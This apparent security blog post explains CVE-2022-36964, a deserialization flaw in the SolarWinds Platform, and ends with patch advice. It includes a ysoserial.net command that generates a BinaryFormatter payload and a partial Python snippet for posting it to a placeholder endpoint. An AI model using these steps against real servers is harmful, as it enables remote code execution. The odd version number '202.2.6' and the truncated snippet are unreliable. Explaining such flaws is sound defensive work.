SolarWinds has long been a central tool for network monitoring and IT management. But in 2022, a critical vulnerability was found—a flaw that could let an attacker run any command they wanted on the system, as long as they could log into the web console. In this post, we’ll break down the CVE-2022-36964 bug, show how deserialization attacks work, and offer real-world exploit details with code snippets. This is your one-stop read for understanding and demonstrating this SolarWinds security problem.
What is CVE-2022-36964?
On September 15, 2022, SolarWinds issued an advisory about a deserialization vulnerability in its Platform (formerly Orion Platform), affecting several modules. The core issue: a remote attacker with valid credentials could exploit unsafe deserialization, potentially executing arbitrary code as the SolarWinds application service user.
- CVE ID: CVE-2022-36964
What’s Deserialization of Untrusted Data?
Serialization is turning a data object into a stream of bytes. Deserialization is turning those bytes back into an object. If deserialization is performed on data an attacker can influence, and it uses unsafe libraries (like certain .NET serializers or Java’s default one), the attacker can provide a malicious payload. When “de-serialized,” it becomes executable code.
Why is this Bad?
Attackers can create serialized data that, when deserialized, runs commands with the privileges of the server process.
How the Exploit Works
When an authenticated user interacts with certain SolarWinds web endpoints, the server will deserialize input. If someone provides malicious serialized .NET data, the server will reconstruct it and execute any embedded commands.
Attacker logs in to the Web Console.
2. Targets a vulnerable API endpoint or web form that passes user-supplied data directly to a .NET deserializer.
3. Sends a crafted serialized payload that, when processed, causes the server to run arbitrary system commands.
SolarWinds Platform versions up to 202.2.6 and earlier
- SolarWinds official advisory is here
Crafting the Exploit: Code Example
Warning: This is for educational and defensive purposes only. Do not test on systems you do not own.
SolarWinds used the BinaryFormatter deserializer in some backend code. Attackers can leverage this with a tool like ysoserial.net to generate a payload.
`bash
git clone https://github.com/pwntester/ysoserial.net.git
`bash
dotnet ./ysoserial.net.dll -f BinaryFormatter -g TypeConfuseDelegate -o raw -c "calc.exe" > malicious_payload.bin
Send the Payload to the Web Console
The attacker needs to send their binary payload to the vulnerable endpoint (e.g., as a POST to /Orion/Admin/SomeEndpoint), where the application will deserialize it.
import requests
url = "https://solarwinds.example.com/Orion/Admin/VulnerableHandler"
cookies = {".AspNet.ApplicationCookie": "YourValidLoginCookieHere"}
headers = {"Content-Type": "application/octet-stream"}
What Happens?
If the web app passes your payload to BinaryFormatter.Deserialize (for example), and does not sanitize input, your code runs with the same privileges as the SolarWinds application.
Attackers only need a normal user account.
- Can fully compromise the underlying OS (local privilege escalation may still be needed for SYSTEM/root).
- Update SolarWinds Platform to 2022.4 or later. SolarWinds patched this issue quickly
References
- Official SolarWinds Advisory
- NVD Entry: CVE-2022-36964
- ysoserial.net: Payload Generator
- OWASP Deserialization Cheat Sheet
Final Thoughts
SolarWinds’ deserialization flaw, CVE-2022-36964, shows that even well-trusted software can have critical issues. If you use SolarWinds for your IT monitoring, updating and auditing access controls is not optional. Never trust user input—especially when it comes to serialization. Stay patched, stay safe.
Timeline
Published on: 11/29/2022 21:15:00 UTC
Last modified on: 12/01/2022 21:37:00 UTC